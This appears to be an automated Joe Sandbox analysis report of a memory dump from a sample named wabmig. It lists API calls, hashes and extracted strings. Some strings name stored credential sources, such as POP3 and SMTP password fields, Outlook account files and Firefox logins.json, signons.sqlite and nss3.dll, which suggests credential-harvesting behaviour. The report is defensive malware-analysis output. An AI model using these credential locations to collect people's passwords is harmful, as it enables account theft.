                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                            • String ID:
                                                                            • API String ID: 4165544737-0
                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                            APIs
                                                                            • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: EnumNamesResource
                                                                            • String ID:
                                                                            • API String ID: 3334572018-0
                                                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                            APIs
                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                            • API String ID: 3963849919-1658304561
                                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                            • memset.MSVCRT ref: 0040128E
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                            • String ID:
                                                                            • API String ID: 2998058495-0
                                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 633282248-1996832678
                                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: sprintf$memset$_mbscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
APIs
  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
• strlen.MSVCRT ref: 0040F139
• strlen.MSVCRT ref: 0040F147
• memset.MSVCRT ref: 0040F187
• strlen.MSVCRT ref: 0040F196
• strlen.MSVCRT ref: 0040F1A4
• memset.MSVCRT ref: 0040F1EA
• strlen.MSVCRT ref: 0040F1F9
• strlen.MSVCRT ref: 0040F207
• _strcmpi.MSVCRT ref: 0040F2B2
• _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
• _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
Strings
Similarity
• API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
• String ID: logins.json$none$signons.sqlite$signons.txt
APIs
• memset.MSVCRT ref: 0040C3F7
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
• strrchr.MSVCRT ref: 0040C417
• _mbscat.MSVCRT ref: 0040C431
• _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
• _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
• GetWindowPlacement.USER32(?,?), ref: 0040C50C
Strings
Similarity
• API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
• String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
• FreeLibrary.KERNEL32(00000000), ref: 004100C4
Strings
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
APIs
• wcsstr.MSVCRT ref: 0040426A
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
• _mbscpy.MSVCRT(?,?), ref: 004042D5
• _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
• strchr.MSVCRT ref: 004042F6
• strlen.MSVCRT ref: 0040430A
• sprintf.MSVCRT ref: 0040432B
• strchr.MSVCRT ref: 0040433C
Strings
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
APIs
Strings
Similarity
• API ID: _strcmpi_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
APIs
• strchr.MSVCRT ref: 004100E4
• _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
• _mbscat.MSVCRT ref: 0041014D
• memset.MSVCRT ref: 00410129
  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
• memset.MSVCRT ref: 00410171
• memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
• _mbscat.MSVCRT ref: 00410197
Strings
Similarity
• API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
APIs
  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
• strchr.MSVCRT ref: 0040327B
Strings
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
APIs
• memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
• memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
• memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
Strings
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
APIs
• SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
• SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
• LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
• LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
• GetSysColor.USER32(0000000F), ref: 0040B472
• DeleteObject.GDI32(?), ref: 0040B4A6
• DeleteObject.GDI32(00000000), ref: 0040B4A9
• SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
Similarity
• API ID: MessageSend$DeleteImageLoadObject$Color
• String ID:
APIs
• GetSystemMetrics.USER32(00000011), ref: 004072E7
• GetSystemMetrics.USER32(00000010), ref: 004072ED
• GetDC.USER32(00000000), ref: 004072FB
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
• GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
• ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
• GetWindowRect.USER32(004012E4,?), ref: 0040732C
• MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
Similarity
• API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
• String ID:
APIs
Strings
Similarity
• API ID: memcpymemset
• String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
APIs
Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm$__aullrem
                                                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                            • API String ID: 643879872-978417875
                                                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
APIs
• memset.MSVCRT ref: 0040810E
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
• LocalFree.KERNEL32(?,?,?,?,?,00000000,7597EB20,?), ref: 004081B9
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 524865279-2190619648
• Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
• Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
• Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
• Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
• Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
• Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
• Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
• Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
APIs
  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
• ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
• CloseHandle.KERNEL32(?), ref: 00444206
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID: ACD
• API String ID: 1886237854-620537770
• Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
• Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
• Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
• Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
APIs
• memset.MSVCRT ref: 004091EC
• sprintf.MSVCRT ref: 00409201
  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
• SetWindowTextA.USER32(?,?), ref: 00409228
• EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
• Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
• Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
• Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
• Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
• memset.MSVCRT ref: 00410246
• memset.MSVCRT ref: 00410258
  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
• memset.MSVCRT ref: 0041033F
• _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
• CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
• Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
• Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
• Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
• Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
APIs
• wcslen.MSVCRT ref: 0044406C
• ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
• WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
